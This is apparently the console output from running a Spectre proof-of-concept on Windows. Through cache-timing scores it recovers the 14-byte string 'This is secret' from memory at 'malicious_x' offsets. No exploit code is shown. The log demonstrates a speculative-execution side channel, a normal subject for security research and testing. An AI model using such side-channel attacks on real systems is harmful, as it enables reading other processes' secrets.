F:\Spectre_PoC\x86_64-8.1.0-win32-seh-rt_v6-rev0>spectre.out
Reading 14 bytes:
Reading at malicious_x = 000000000000104C... Unclear: 0x54='T' score=999 (second best: 0x53='S' score=995)
Reading at malicious_x = 000000000000104D... Unclear: 0x68='h' score=998 (second best: 0x63='c' score=967)
Reading at malicious_x = 000000000000104E... Unclear: 0x69='i' score=999 (second best: 0xFE='?' score=934)
Reading at malicious_x = 000000000000104F... Unclear: 0x73='s' score=998 (second best: 0x31='1' score=886)
Reading at malicious_x = 0000000000001050... Unclear: 0x20=' ' score=999 (second best: 0x1B='?' score=966)
Reading at malicious_x = 0000000000001051... Unclear: 0x69='i' score=995 (second best: 0xA9='?' score=930)
Reading at malicious_x = 0000000000001052... Unclear: 0x73='s' score=998 (second best: 0x75='u' score=955)
Reading at malicious_x = 0000000000001053... Unclear: 0x20=' ' score=999 (second best: 0x1B='?' score=923)
Reading at malicious_x = 0000000000001054... Unclear: 0x73='s' score=997 (second best: 0x75='u' score=917)
Reading at malicious_x = 0000000000001055... Unclear: 0x65='e' score=999 (second best: 0x67='g' score=915)
Reading at malicious_x = 0000000000001056... Unclear: 0x63='c' score=999 (second best: 0x3E='>' score=913)
Reading at malicious_x = 0000000000001057... Unclear: 0x72='r' score=998 (second best: 0x1F='?' score=886)
Reading at malicious_x = 0000000000001058... Unclear: 0x65='e' score=996 (second best: 0x67='g' score=912)
Reading at malicious_x = 0000000000001059... Unclear: 0x74='t' score=998 (second best: 0x76='v' score=869)